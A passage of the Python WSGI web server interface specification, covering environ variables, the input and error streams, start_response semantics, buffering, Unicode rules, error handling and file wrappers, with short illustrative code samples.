When HTTP_HOST is not set, these variables can be combined to determine a +default. See the URL Reconstruction section below for more detail. +SERVER_NAME and SERVER_PORT are required strings and must never be +empty.
+
SERVER_PROTOCOL
The version of the protocol the client used to send the request. +Typically this will be something like "HTTP/1.0" or "HTTP/1.1" +and may be used by the application to determine how to treat any +HTTP request headers. (This variable should probably be called +REQUEST_PROTOCOL, since it denotes the protocol used in the +request, and is not necessarily the protocol that will be used in the +server’s response. However, for compatibility with CGI we have to +keep the existing name.)
+
HTTP_ Variables
Variables corresponding to the client-supplied HTTP request headers +(i.e., variables whose names begin with "HTTP_"). The presence or +absence of these variables should correspond with the presence or +absence of the appropriate HTTP header in the request.
+
+

A server or gateway should attempt to provide as many other CGI variables as are applicable. In addition, if SSL is in use, the server or gateway should also provide as many of the Apache SSL environment variables [5] as are applicable, such as HTTPS=on and SSL_PROTOCOL. Note, however, that an application that uses any CGI variables other than the ones listed above is necessarily non-portable to web servers that do not support the relevant extensions. (For example, web servers that do not publish files will not be able to provide a meaningful DOCUMENT_ROOT or PATH_TRANSLATED.)

+

A WSGI-compliant server or gateway should document what variables +it provides, along with their definitions as appropriate. Applications +should check for the presence of any variables they require, and +have a fallback plan in the event such a variable is absent.

+
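As one illustration of such a fallback plan (a sketch of ours, not a requirement of this specification), an application might derive an effective host from the always-present SERVER_NAME and SERVER_PORT when the optional HTTP_HOST is absent:

def effective_host(environ):
    # Prefer the client-supplied Host header when present...
    host = environ.get('HTTP_HOST')
    if host:
        return host
    # ...otherwise fall back to the required, never-empty variables.
    return environ['SERVER_NAME'] + ':' + environ['SERVER_PORT']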

Note: missing variables (such as REMOTE_USER when no +authentication has occurred) should be left out of the environ +dictionary. Also note that CGI-defined variables must be native strings, +if they are present at all. It is a violation of this specification +for any CGI variable’s value to be of any type other than str.

+

In addition to the CGI-defined variables, the environ dictionary +may also contain arbitrary operating-system “environment variables”, +and must contain the following WSGI-defined variables:

wsgi.version
The tuple (1, 0), representing WSGI version 1.0.

wsgi.url_scheme
A string representing the “scheme” portion of the URL at which the application is being invoked. Normally, this will have the value "http" or "https", as appropriate.

wsgi.input
An input stream (file-like object) from which the HTTP request body bytes can be read. (The server or gateway may perform reads on-demand as requested by the application, or it may pre-read the client’s request body and buffer it in-memory or on disk, or use any other technique for providing such an input stream, according to its preference.)

wsgi.errors
An output stream (file-like object) to which error output can be written, for the purpose of recording program or other errors in a standardized and possibly centralized location. This should be a “text mode” stream; i.e., applications should use "\n" as a line ending, and assume that it will be converted to the correct line ending by the server/gateway.
(On platforms where the str type is unicode, the error stream should accept and log arbitrary unicode without raising an error; it is allowed, however, to substitute characters that cannot be rendered in the stream’s encoding.)
For many servers, wsgi.errors will be the server’s main error log. Alternatively, this may be sys.stderr, or a log file of some sort. The server’s documentation should include an explanation of how to configure this or where to find the recorded output. A server or gateway may supply different error streams to different applications, if this is desired.

wsgi.multithread
This value should evaluate true if the application object may be simultaneously invoked by another thread in the same process, and should evaluate false otherwise.

wsgi.multiprocess
This value should evaluate true if an equivalent application object may be simultaneously invoked by another process, and should evaluate false otherwise.

wsgi.run_once
This value should evaluate true if the server or gateway expects (but does not guarantee!) that the application will only be invoked this one time during the life of its containing process. Normally, this will only be true for a gateway based on CGI (or something similar).
+

Finally, the environ dictionary may also contain server-defined +variables. These variables should be named using only lower-case +letters, numbers, dots, and underscores, and should be prefixed with +a name that is unique to the defining server or gateway. For +example, mod_python might define variables with names like +mod_python.some_variable.

+
+

Input and Error Streams

+

The input and error streams provided by the server must support +the following methods:

Method             Stream    Notes

read(size)         input     1
readline()         input     1, 2
readlines(hint)    input     1, 3
__iter__()         input
flush()            errors    4
write(str)         errors
writelines(seq)    errors
+

The semantics of each method are as documented in the Python Library +Reference, except for these notes as listed in the table above:

+
1. The server is not required to read past the client’s specified Content-Length, and should simulate an end-of-file condition if the application attempts to read past that point. The application should not attempt to read more data than is specified by the CONTENT_LENGTH variable.
   A server should allow read() to be called without an argument, and return the remainder of the client’s input stream.
   A server should return empty bytestrings from any attempt to read from an empty or exhausted input stream. (A bounded-read sketch follows this list.)
2. Servers should support the optional “size” argument to readline(), but as in WSGI 1.0, they are allowed to omit support for it.
   (In WSGI 1.0, the size argument was not supported, on the grounds that it might have been complex to implement, and was not often used in practice… but then the cgi module started using it, and so practical servers had to start supporting it anyway!)
3. Note that the hint argument to readlines() is optional for both caller and implementer. The application is free not to supply it, and the server or gateway is free to ignore it.
4. Since the errors stream may not be rewound, servers and gateways are free to forward write operations immediately, without buffering. In this case, the flush() method may be a no-op. Portable applications, however, cannot assume that output is unbuffered or that flush() is a no-op. They must call flush() if they need to ensure that output has in fact been written. (For example, to minimize intermingling of data from multiple processes writing to the same error log.)
+
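As promised in note 1 above, here is a minimal sketch (ours, not part of the specification) of a portable, bounded read that never attempts to go past CONTENT_LENGTH:

def read_request_body(environ):
    # An absent or empty CONTENT_LENGTH is treated as zero.
    try:
        length = int(environ.get('CONTENT_LENGTH') or 0)
    except ValueError:
        length = 0
    if length <= 0:
        return b''
    # Never ask wsgi.input for more than the declared length.
    return environ['wsgi.input'].read(length)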

The methods listed in the table above must be supported by all +servers conforming to this specification. Applications conforming +to this specification must not use any other methods or attributes +of the input or errors objects. In particular, applications +must not attempt to close these streams, even if they possess +close() methods.

+
+
+
+

The start_response() Callable

+

The second parameter passed to the application object is a callable +of the form start_response(status, response_headers, exc_info=None). +(As with all WSGI callables, the arguments must be supplied +positionally, not by keyword.) The start_response callable is +used to begin the HTTP response, and it must return a +write(body_data) callable (see the Buffering and Streaming +section, below).

+

The status argument is an HTTP “status” string like "200 OK" +or "404 Not Found". That is, it is a string consisting of a +Status-Code and a Reason-Phrase, in that order and separated by a +single space, with no surrounding whitespace or other characters. +(See RFC 2616, Section 6.1.1 for more information.) The string +must not contain control characters, and must not be terminated +with a carriage return, linefeed, or combination thereof.

+

The response_headers argument is a list of (header_name, header_value) tuples. It must be a Python list; i.e. type(response_headers) is list, and the server may change its contents in any way it desires. Each header_name must be a valid HTTP header field-name (as defined by RFC 2616, Section 4.2), without a trailing colon or other punctuation.

+

Each header_value must not include any control characters, +including carriage returns or linefeeds, either embedded or at the end. +(These requirements are to minimize the complexity of any parsing that +must be performed by servers, gateways, and intermediate response +processors that need to inspect or modify response headers.)

+

In general, the server or gateway is responsible for ensuring that +correct headers are sent to the client: if the application omits +a header required by HTTP (or other relevant specifications that are in +effect), the server or gateway must add it. For example, the HTTP +Date: and Server: headers would normally be supplied by the +server or gateway.

+

(A reminder for server/gateway authors: HTTP header names are +case-insensitive, so be sure to take that into consideration when +examining application-supplied headers!)

+

Applications and middleware are forbidden from using HTTP/1.1 +“hop-by-hop” features or headers, any equivalent features in HTTP/1.0, +or any headers that would affect the persistence of the client’s +connection to the web server. These features are the +exclusive province of the actual web server, and a server or gateway +should consider it a fatal error for an application to attempt +sending them, and raise an error if they are supplied to +start_response(). (For more specifics on “hop-by-hop” features and +headers, please see the Other HTTP Features section below.)

+

Servers should check for errors in the headers at the time +start_response is called, so that an error can be raised while +the application is still running.

+

However, the start_response callable must not actually transmit the +response headers. Instead, it must store them for the server or +gateway to transmit only after the first iteration of the +application return value that yields a non-empty bytestring, or upon +the application’s first invocation of the write() callable. In +other words, response headers must not be sent until there is actual +body data available, or until the application’s returned iterable is +exhausted. (The only possible exception to this rule is if the +response headers explicitly include a Content-Length of zero.)

+

This delaying of response header transmission is to ensure that buffered +and asynchronous applications can replace their originally intended +output with error output, up until the last possible moment. For +example, the application may need to change the response status from +“200 OK” to “500 Internal Error”, if an error occurs while the body is +being generated within an application buffer.

+

The exc_info argument, if supplied, must be a Python +sys.exc_info() tuple. This argument should be supplied by the +application only if start_response is being called by an error +handler. If exc_info is supplied, and no HTTP headers have been +output yet, start_response should replace the currently-stored +HTTP response headers with the newly-supplied ones, thus allowing the +application to “change its mind” about the output when an error has +occurred.

+

However, if exc_info is provided, and the HTTP headers have already +been sent, start_response must raise an error, and should +re-raise using the exc_info tuple. That is:

+
raise exc_info[1].with_traceback(exc_info[2])
+
+
+

This will re-raise the exception trapped by the application, and in +principle should abort the application. (It is not safe for the +application to attempt error output to the browser once the HTTP +headers have already been sent.) The application must not trap +any exceptions raised by start_response, if it called +start_response with exc_info. Instead, it should allow +such exceptions to propagate back to the server or gateway. See +Error Handling below, for more details.

+

The application may call start_response more than once, if and +only if the exc_info argument is provided. More precisely, it is +a fatal error to call start_response without the exc_info +argument if start_response has already been called within the +current invocation of the application. This includes the case where +the first call to start_response raised an error. (See the example +CGI gateway above for an illustration of the correct logic.)

+

Note: servers, gateways, or middleware implementing start_response +should ensure that no reference is held to the exc_info +parameter beyond the duration of the function’s execution, to avoid +creating a circular reference through the traceback and frames +involved. The simplest way to do this is something like:

+
def start_response(status, response_headers, exc_info=None):
+    if exc_info:
+         try:
+             # do stuff w/exc_info here
+         finally:
+             exc_info = None    # Avoid circular ref.
+
+
+

The example CGI gateway provides another illustration of this +technique.

+
+

Handling the Content-Length Header

+

If the application supplies a Content-Length header, the server +should not transmit more bytes to the client than the header +allows, and should stop iterating over the response when enough +data has been sent, or raise an error if the application tries to +write() past that point. (Of course, if the application does +not provide enough data to meet its stated Content-Length, +the server should close the connection and log or otherwise +report the error.)

+

If the application does not supply a Content-Length header, a +server or gateway may choose one of several approaches to handling +it. The simplest of these is to close the client connection when +the response is completed.

+

Under some circumstances, however, the server or gateway may be +able to either generate a Content-Length header, or at least +avoid the need to close the client connection. If the application +does not call the write() callable, and returns an iterable +whose len() is 1, then the server can automatically determine +Content-Length by taking the length of the first bytestring yielded +by the iterable.

+
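Here is a sketch (illustrative only; servers are free to implement the inference differently) of that length check:

def inferred_content_length(result):
    # Only a one-element iterable with a working __len__() qualifies.
    try:
        if len(result) != 1:
            return None
    except TypeError:
        return None              # no __len__(); use another strategy
    body = next(iter(result))
    return len(body)

For a list such as [b"Hello world!\n"] this yields 13; for a generator it yields None, and the server must fall back to one of the other strategies.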

And, if the server and client both support HTTP/1.1 +“chunked encoding”, +then the server may use chunked encoding to send +a chunk for each write() call or bytestring yielded by the iterable, +thus generating a Content-Length header for each chunk. This +allows the server to keep the client connection alive, if it wishes +to do so. Note that the server must comply fully with RFC 2616 +when doing this, or else fall back to one of the other strategies for +dealing with the absence of Content-Length.

+

(Note: applications and middleware must not apply any kind of +Transfer-Encoding to their output, such as chunking or gzipping; +as “hop-by-hop” operations, these encodings are the province of the +actual web server/gateway. See Other HTTP Features below, for +more details.)

+
+
+
+

Buffering and Streaming

+

Generally speaking, applications will achieve the best throughput +by buffering their (modestly-sized) output and sending it all at +once. This is a common approach in existing frameworks such as +Zope: the output is buffered in a StringIO or similar object, then +transmitted all at once, along with the response headers.

+

The corresponding approach in WSGI is for the application to simply return a single-element iterable (such as a list) containing the response body as a single bytestring. This is the recommended approach for the vast majority of application functions that render HTML pages whose text easily fits in memory.

+
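A minimal buffered application along these lines might look like the following sketch (illustrative only):

def buffered_app(environ, start_response):
    # Assemble the whole (modestly sized) body before sending anything.
    parts = [b'<html><body>', b'Hello, world!', b'</body></html>']
    body = b''.join(parts)
    start_response('200 OK', [('Content-type', 'text/html'),
                              ('Content-Length', str(len(body)))])
    # A single-element list: one bytestring, transmitted all at once.
    return [body]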

For large files, however, or for specialized uses of HTTP streaming +(such as multipart “server push”), an application may need to provide +output in smaller blocks (e.g. to avoid loading a large file into +memory). It’s also sometimes the case that part of a response may +be time-consuming to produce, but it would be useful to send ahead the +portion of the response that precedes it.

+

In these cases, applications will usually return an iterator (often +a generator-iterator) that produces the output in a block-by-block +fashion. These blocks may be broken to coincide with multipart +boundaries (for “server push”), or just before time-consuming +tasks (such as reading another block of an on-disk file).

+

WSGI servers, gateways, and middleware must not delay the +transmission of any block; they must either fully transmit +the block to the client, or guarantee that they will continue +transmission even while the application is producing its next block. +A server/gateway or middleware may provide this guarantee in one of +three ways:

+
1. Send the entire block to the operating system (and request that any O/S buffers be flushed) before returning control to the application, OR
2. Use a different thread to ensure that the block continues to be transmitted while the application produces the next block.
3. (Middleware only) send the entire block to its parent gateway/server
+

By providing this guarantee, WSGI allows applications to ensure +that transmission will not become stalled at an arbitrary point +in their output data. This is critical for proper functioning +of e.g. multipart “server push” streaming, where data between +multipart boundaries should be transmitted in full to the client.

+
+

Middleware Handling of Block Boundaries

+

In order to better support asynchronous applications and servers, +middleware components must not block iteration waiting for +multiple values from an application iterable. If the middleware +needs to accumulate more data from the application before it can +produce any output, it must yield an empty bytestring.

+

To put this requirement another way, a middleware component must +yield at least one value each time its underlying application +yields a value. If the middleware cannot yield any other value, +it must yield an empty bytestring.

+
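Here is an illustrative sketch (the class name and threshold are ours, not part of the specification) of a middleware iterable that obeys this rule while accumulating data; a complete component would also forward close() to the wrapped iterable:

class Accumulator:
    def __init__(self, result, threshold=4096):
        self._it = iter(result)
        self._buffer = b''
        self._threshold = threshold

    def __iter__(self):
        return self

    def __next__(self):
        try:
            self._buffer += next(self._it)
        except StopIteration:
            if self._buffer:
                out, self._buffer = self._buffer, b''
                return out       # flush the remainder before stopping
            raise
        if len(self._buffer) < self._threshold:
            return b''           # one value out per value in; never block
        out, self._buffer = self._buffer, b''
        return out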

This requirement ensures that asynchronous applications and servers +can conspire to reduce the number of threads that are required +to run a given number of application instances simultaneously.

+

Note also that this requirement means that middleware must +return an iterable as soon as its underlying application returns +an iterable. It is also forbidden for middleware to use the +write() callable to transmit data that is yielded by an +underlying application. Middleware may only use their parent +server’s write() callable to transmit data that the +underlying application sent using a middleware-provided write() +callable.

+
+
+

The write() Callable

+

Some existing application framework APIs support unbuffered +output in a different manner than WSGI. Specifically, they +provide a “write” function or method of some kind to write +an unbuffered block of data, or else they provide a buffered +“write” function and a “flush” mechanism to flush the buffer.

+

Unfortunately, such APIs cannot be implemented in terms of +WSGI’s “iterable” application return value, unless threads +or other special mechanisms are used.

+

Therefore, to allow these frameworks to continue using an +imperative API, WSGI includes a special write() callable, +returned by the start_response callable.

+

New WSGI applications and frameworks should not use the +write() callable if it is possible to avoid doing so. The +write() callable is strictly a hack to support imperative +streaming APIs. In general, applications should produce their +output via their returned iterable, as this makes it possible +for web servers to interleave other tasks in the same Python thread, +potentially providing better throughput for the server as a whole.

+

The write() callable is returned by the start_response() +callable, and it accepts a single parameter: a bytestring to be +written as part of the HTTP response body, that is treated exactly +as though it had been yielded by the output iterable. In other +words, before write() returns, it must guarantee that the +passed-in bytestring was either completely sent to the client, or +that it is buffered for transmission while the application +proceeds onward.

+

An application must return an iterable object, even if it +uses write() to produce all or part of its response body. +The returned iterable may be empty (i.e. yield no non-empty +bytestrings), but if it does yield non-empty bytestrings, that output +must be treated normally by the server or gateway (i.e., it must be +sent or queued immediately). Applications must not invoke +write() from within their return iterable, and therefore any +bytestrings yielded by the iterable are transmitted after all bytestrings +passed to write() have been sent to the client.

+
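For illustration only, a sketch of the imperative style described above; new code should prefer returning the body via the iterable instead:

def imperative_app(environ, start_response):
    write = start_response('200 OK', [('Content-type', 'text/plain')])
    # The body is pushed through write(); the returned iterable is empty.
    write(b'Hello ')
    write(b'world!\n')
    return []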
+
+
+

Unicode Issues

+

HTTP does not directly support Unicode, and neither does this +interface. All encoding/decoding must be handled by the application; +all strings passed to or from the server must be of type str or +bytes, never unicode. The result of using a unicode +object where a string object is required, is undefined.

+

Note also that strings passed to start_response() as a status or +as response headers must follow RFC 2616 with respect to encoding. +That is, they must either be ISO-8859-1 characters, or use RFC 2047 +MIME encoding.

+

On Python platforms where the str or StringType type is in +fact Unicode-based (e.g. Jython, IronPython, Python 3, etc.), all +“strings” referred to in this specification must contain only +code points representable in ISO-8859-1 encoding (\u0000 through +\u00FF, inclusive). It is a fatal error for an application to +supply strings containing any other Unicode character or code point. +Similarly, servers and gateways must not supply +strings to an application containing any other Unicode characters.

+
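A small sketch (ours, not part of the specification) of the check this rule implies:

def is_valid_native_string(s):
    # Only code points \u0000 through \u00FF survive Latin-1 encoding.
    try:
        s.encode('iso-8859-1')
        return True
    except UnicodeEncodeError:
        return False

assert is_valid_native_string('200 OK')
assert not is_valid_native_string('snowman: \u2603')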

Again, all objects referred to in this specification as “strings” +must be of type str or StringType, and must not be +of type unicode or UnicodeType. And, even if a given platform +allows for more than 8 bits per character in str/StringType +objects, only the lower 8 bits may be used, for any value referred +to in this specification as a “string”.

+

For values referred to in this specification as “bytestrings” +(i.e., values read from wsgi.input, passed to write() +or yielded by the application), the value must be of type +bytes under Python 3, and str in earlier versions of +Python.

+
+
+

Error Handling

+

In general, applications should try to trap their own, internal +errors, and display a helpful message in the browser. (It is up +to the application to decide what “helpful” means in this context.)

+

However, to display such a message, the application must not have +actually sent any data to the browser yet, or else it risks corrupting +the response. WSGI therefore provides a mechanism to either allow the +application to send its error message, or be automatically aborted: +the exc_info argument to start_response. Here is an example +of its use:

+
try:
+    # regular application code here ('sys' is assumed to be imported
+    # at module level, since sys.exc_info() is used below)
+    status = "200 Froody"
+    response_headers = [("content-type", "text/plain")]
+    start_response(status, response_headers)
+    return [b"normal body goes here"]
+except:
+    # XXX should trap runtime issues like MemoryError, KeyboardInterrupt
+    #     in a separate handler before this bare 'except:'...
+    status = "500 Oops"
+    response_headers = [("content-type", "text/plain")]
+    start_response(status, response_headers, sys.exc_info())
+    return [b"error body goes here"]
+
+
+

If no output has been written when an exception occurs, the call to +start_response will return normally, and the application will +return an error body to be sent to the browser. However, if any output +has already been sent to the browser, start_response will reraise +the provided exception. This exception should not be trapped by +the application, and so the application will abort. The server or +gateway can then trap this (fatal) exception and abort the response.

+

Servers should trap and log any exception that aborts an +application or the iteration of its return value. If a partial +response has already been written to the browser when an application +error occurs, the server or gateway may attempt to add an error +message to the output, if the already-sent headers indicate a +text/* content type that the server knows how to modify cleanly.

+

Some middleware may wish to provide additional exception handling +services, or intercept and replace application error messages. In +such cases, middleware may choose to not re-raise the exc_info +supplied to start_response, but instead raise a middleware-specific +exception, or simply return without an exception after storing the +supplied arguments. This will then cause the application to return +its error body iterable (or invoke write()), allowing the middleware +to capture and modify the error output. These techniques will work as +long as application authors:

+
1. Always provide exc_info when beginning an error response
2. Never trap errors raised by start_response when exc_info is being provided
+
+
+

HTTP 1.1 Expect/Continue

+

Servers and gateways that implement HTTP 1.1 must provide +transparent support for HTTP 1.1’s “expect/continue” mechanism. This +may be done in any of several ways:

+
1. Respond to requests containing an Expect: 100-continue request with an immediate “100 Continue” response, and proceed normally.
2. Proceed with the request normally, but provide the application with a wsgi.input stream that will send the “100 Continue” response if/when the application first attempts to read from the input stream. The read request must then remain blocked until the client responds.
3. Wait until the client decides that the server does not support expect/continue, and sends the request body on its own. (This is suboptimal, and is not recommended.)
+

Note that these behavior restrictions do not apply for HTTP 1.0 +requests, or for requests that are not directed to an application +object. For more information on HTTP 1.1 Expect/Continue, see +RFC 2616, sections 8.2.3 and 10.1.1.

+
+
+

Other HTTP Features

+

In general, servers and gateways should “play dumb” and allow the +application complete control over its output. They should only make +changes that do not alter the effective semantics of the application’s +response. It is always possible for the application developer to add +middleware components to supply additional features, so server/gateway +developers should be conservative in their implementation. In a sense, +a server should consider itself to be like an HTTP “gateway server”, +with the application being an HTTP “origin server”. (See RFC 2616, +section 1.3, for the definition of these terms.)

+

However, because WSGI servers and applications do not communicate via +HTTP, what RFC 2616 calls “hop-by-hop” headers do not apply to WSGI +internal communications. WSGI applications must not generate any +“hop-by-hop” headers, +attempt to use HTTP features that would +require them to generate such headers, or rely on the content of +any incoming “hop-by-hop” headers in the environ dictionary. +WSGI servers must handle any supported inbound “hop-by-hop” headers +on their own, such as by decoding any inbound Transfer-Encoding, +including chunked encoding if applicable.

+

Applying these principles to a variety of HTTP features, it should be +clear that a server may handle cache validation via the +If-None-Match and If-Modified-Since request headers and the +Last-Modified and ETag response headers. However, it is +not required to do this, and the application should perform its +own cache validation if it wants to support that feature, since +the server/gateway is not required to do such validation.

+

Similarly, a server may re-encode or transport-encode an +application’s response, but the application should use a +suitable content encoding on its own, and must not apply a +transport encoding. A server may transmit byte ranges of the +application’s response if requested by the client, and the +application doesn’t natively support byte ranges. Again, however, +the application should perform this function on its own if desired.

+

Note that these restrictions on applications do not necessarily mean +that every application must reimplement every HTTP feature; many HTTP +features can be partially or fully implemented by middleware +components, thus freeing both server and application authors from +implementing the same features over and over again.

+
+
+

Thread Support

+

Thread support, or lack thereof, is also server-dependent. Servers that can run multiple requests in parallel should also provide the option of running an application in a single-threaded fashion, so that applications or frameworks that are not thread-safe may still be used with that server.

+
+
+
+

Implementation/Application Notes

+
+

Server Extension APIs

+

Some server authors may wish to expose more advanced APIs, that +application or framework authors can use for specialized purposes. +For example, a gateway based on mod_python might wish to expose +part of the Apache API as a WSGI extension.

+

In the simplest case, this requires nothing more than defining an +environ variable, such as mod_python.some_api. But, in many +cases, the possible presence of middleware can make this difficult. +For example, an API that offers access to the same HTTP headers that +are found in environ variables, might return different data if +environ has been modified by middleware.

+

In general, any extension API that duplicates, supplants, or bypasses +some portion of WSGI functionality runs the risk of being incompatible +with middleware components. Server/gateway developers should not +assume that nobody will use middleware, because some framework +developers specifically intend to organize or reorganize their +frameworks to function almost entirely as middleware of various kinds.

+

So, to provide maximum compatibility, servers and gateways that +provide extension APIs that replace some WSGI functionality, must +design those APIs so that they are invoked using the portion of the +API that they replace. For example, an extension API to access HTTP +request headers must require the application to pass in its current +environ, so that the server/gateway may verify that HTTP headers +accessible via the API have not been altered by middleware. If the +extension API cannot guarantee that it will always agree with +environ about the contents of HTTP headers, it must refuse service +to the application, e.g. by raising an error, returning None +instead of a header collection, or whatever is appropriate to the API.

+
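To make this concrete, here is a hypothetical sketch (the API name and shape are ours and do not correspond to any real server) of an extension object that verifies environ before serving raw request headers:

class RawHeaderAPI:
    def __init__(self, raw_headers):
        # Header snapshot captured by the server at request start,
        # e.g. {'HTTP_HOST': 'example.com'}.
        self._raw = dict(raw_headers)

    def get_headers(self, environ):
        for key, value in self._raw.items():
            if environ.get(key) != value:
                # environ disagrees (middleware rewrote it): refuse
                # service rather than bypass the middleware's mediation.
                return None
        return dict(self._raw)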

Similarly, if an extension API provides an alternate means of writing +response data or headers, it should require the start_response +callable to be passed in, before the application can obtain the +extended service. If the object passed in is not the same one that +the server/gateway originally supplied to the application, it cannot +guarantee correct operation and must refuse to provide the extended +service to the application.

+

These guidelines also apply to middleware that adds information such +as parsed cookies, form variables, sessions, and the like to +environ. Specifically, such middleware should provide these +features as functions which operate on environ, rather than simply +stuffing values into environ. This helps ensure that information +is calculated from environ after any middleware has done any URL +rewrites or other environ modifications.

+

It is very important that these “safe extension” rules be followed by +both server/gateway and middleware developers, in order to avoid a +future in which middleware developers are forced to delete any and all +extension APIs from environ to ensure that their mediation isn’t +being bypassed by applications using those extensions!

+
+
+

Application Configuration

+

This specification does not define how a server selects or obtains an +application to invoke. These and other configuration options are +highly server-specific matters. It is expected that server/gateway +authors will document how to configure the server to execute a +particular application object, and with what options (such as +threading options).

+

Framework authors, on the other hand, should document how to create an +application object that wraps their framework’s functionality. The +user, who has chosen both the server and the application framework, +must connect the two together. However, since both the framework and +the server now have a common interface, this should be merely a +mechanical matter, rather than a significant engineering effort for +each new server/framework pair.

+

Finally, some applications, frameworks, and middleware may wish to +use the environ dictionary to receive simple string configuration +options. Servers and gateways should support this by allowing +an application’s deployer to specify name-value pairs to be placed in +environ. In the simplest case, this support can consist merely of +copying all operating system-supplied environment variables from +os.environ into the environ dictionary, since the deployer in +principle can configure these externally to the server, or in the +CGI case they may be able to be set via the server’s configuration +files.

+

Applications should try to keep such required variables to a +minimum, since not all servers will support easy configuration of +them. Of course, even in the worst case, persons deploying an +application can create a script to supply the necessary configuration +values:

+
from the_app import application
+
+def new_app(environ, start_response):
+    environ['the_app.configval1'] = 'something'
+    return application(environ, start_response)
+
+
+

But, most existing applications and frameworks will probably only need +a single configuration value from environ, to indicate the location +of their application or framework-specific configuration file(s). (Of +course, applications should cache such configuration, to avoid having +to re-read it upon each invocation.)

+
+
+

URL Reconstruction

+

If an application wishes to reconstruct a request’s complete URL, it +may do so using the following algorithm, contributed by Ian Bicking:

+
from urllib.parse import quote
+url = environ['wsgi.url_scheme']+'://'
+
+if environ.get('HTTP_HOST'):
+    url += environ['HTTP_HOST']
+else:
+    url += environ['SERVER_NAME']
+
+    if environ['wsgi.url_scheme'] == 'https':
+        if environ['SERVER_PORT'] != '443':
+            url += ':' + environ['SERVER_PORT']
+    else:
+        if environ['SERVER_PORT'] != '80':
+            url += ':' + environ['SERVER_PORT']
+
+url += quote(environ.get('SCRIPT_NAME', ''))
+url += quote(environ.get('PATH_INFO', ''))
+if environ.get('QUERY_STRING'):
+    url += '?' + environ['QUERY_STRING']
+
+
+

Note that such a reconstructed URL may not be precisely the same URI +as requested by the client. Server rewrite rules, for example, may +have modified the client’s originally requested URL to place it in a +canonical form.

+
+
+

Supporting Older (<2.2) Versions of Python

+

Some servers, gateways, or applications may wish to support older +(<2.2) versions of Python. This is especially important if Jython +is a target platform, since as of this writing a production-ready +version of Jython 2.2 is not yet available.

+

For servers and gateways, this is relatively straightforward: +servers and gateways targeting pre-2.2 versions of Python must +simply restrict themselves to using only a standard “for” loop to +iterate over any iterable returned by an application. This is the +only way to ensure source-level compatibility with both the pre-2.2 +iterator protocol (discussed further below) and “today’s” iterator +protocol (see PEP 234).

+

(Note that this technique necessarily applies only to servers, +gateways, or middleware that are written in Python. Discussion of +how to use iterator protocol(s) correctly from other languages is +outside the scope of this PEP.)

+

For applications, supporting pre-2.2 versions of Python is slightly +more complex:

+
    +
  • You may not return a file object and expect it to work as an iterable, +since before Python 2.2, files were not iterable. (In general, you +shouldn’t do this anyway, because it will perform quite poorly most +of the time!) Use wsgi.file_wrapper or an application-specific +file wrapper class. (See Optional Platform-Specific File Handling +for more on wsgi.file_wrapper, and an example class you can use +to wrap a file as an iterable.)
  • +
  • If you return a custom iterable, it must implement the pre-2.2 +iterator protocol. That is, provide a __getitem__ method that +accepts an integer key, and raises IndexError when exhausted. +(Note that built-in sequence types are also acceptable, since they +also implement this protocol.)
  • +
+

Finally, middleware that wishes to support pre-2.2 versions of Python, +and iterates over application return values or itself returns an +iterable (or both), must follow the appropriate recommendations above.

+

(Note: It should go without saying that to support pre-2.2 versions +of Python, any server, gateway, application, or middleware must also +use only language features available in the target version, use +1 and 0 instead of True and False, etc.)

+
+
+

Optional Platform-Specific File Handling

+

Some operating environments provide special high-performance +file-transmission facilities, such as the Unix sendfile() call. +Servers and gateways may expose this functionality via an optional +wsgi.file_wrapper key in the environ. An application +may use this “file wrapper” to convert a file or file-like object +into an iterable that it then returns, e.g.:

+
if 'wsgi.file_wrapper' in environ:
+    return environ['wsgi.file_wrapper'](filelike, block_size)
+else:
+    return iter(lambda: filelike.read(block_size), '')
+
+
+

If the server or gateway supplies wsgi.file_wrapper, it must be +a callable that accepts one required positional parameter, and one +optional positional parameter. The first parameter is the file-like +object to be sent, and the second parameter is an optional block +size “suggestion” (which the server/gateway need not use). The +callable must return an iterable object, and must not perform +any data transmission until and unless the server/gateway actually +receives the iterable as a return value from the application. +(To do otherwise would prevent middleware from being able to interpret +or override the response data.)

+

To be considered “file-like”, the object supplied by the application +must have a read() method that takes an optional size argument. +It may have a close() method, and if so, the iterable returned +by wsgi.file_wrapper must have a close() method that +invokes the original file-like object’s close() method. If the +“file-like” object has any other methods or attributes with names +matching those of Python built-in file objects (e.g. fileno()), +the wsgi.file_wrapper may assume that these methods or +attributes have the same semantics as those of a built-in file object.

+

The actual implementation of any platform-specific file handling +must occur after the application returns, and the server or +gateway checks to see if a wrapper object was returned. (Again, +because of the presence of middleware, error handlers, and the like, +it is not guaranteed that any wrapper created will actually be used.)

+

Apart from the handling of close(), the semantics of returning a +file wrapper from the application should be the same as if the +application had returned iter(filelike.read, ''). In other words, +transmission should begin at the current position within the “file” +at the time that transmission begins, and continue until the end is +reached, or until Content-Length bytes have been written. (If +the application doesn’t supply a Content-Length, the server may +generate one from the file using its knowledge of the underlying file +implementation.)

+

Of course, platform-specific file transmission APIs don’t usually +accept arbitrary “file-like” objects. Therefore, a +wsgi.file_wrapper has to introspect the supplied object for +things such as a fileno() (Unix-like OSes) or a +java.nio.FileChannel (under Jython) in order to determine if +the file-like object is suitable for use with the platform-specific +API it supports.

+

Note that even if the object is not suitable for the platform API, +the wsgi.file_wrapper must still return an iterable that wraps +read() and close(), so that applications using file wrappers +are portable across platforms. Here’s a simple platform-agnostic +file wrapper class, suitable for old (pre 2.2) and new Pythons alike:

+
class FileWrapper:
+
+    def __init__(self, filelike, blksize=8192):
+        self.filelike = filelike
+        self.blksize = blksize
+        if hasattr(filelike, 'close'):
+            self.close = filelike.close
+
+    def __getitem__(self, key):
+        data = self.filelike.read(self.blksize)
+        if data:
+            return data
+        raise IndexError
+
+
+

and here is a snippet from a server/gateway that uses it to provide +access to a platform-specific API (here, transmit_file() and +write_data() stand in for hypothetical server-internal helpers):

+
environ['wsgi.file_wrapper'] = FileWrapper
+result = application(environ, start_response)
+
+try:
+    if isinstance(result, FileWrapper) and hasattr(result.filelike, 'fileno'):
+        # result.filelike is usable with the platform-specific API
+        # (e.g. sendfile() on a Unix-like OS), so use that API to
+        # transmit the result directly.
+        transmit_file(result.filelike.fileno())
+    else:
+        # Otherwise, fall back to the normal iterable handling loop.
+        for data in result:
+            write_data(data)
+finally:
+    if hasattr(result, 'close'):
+        result.close()
+
+
+
+
+
+

Questions and Answers

+
    +
  1. Why must environ be a dictionary? What’s wrong with using a +subclass?

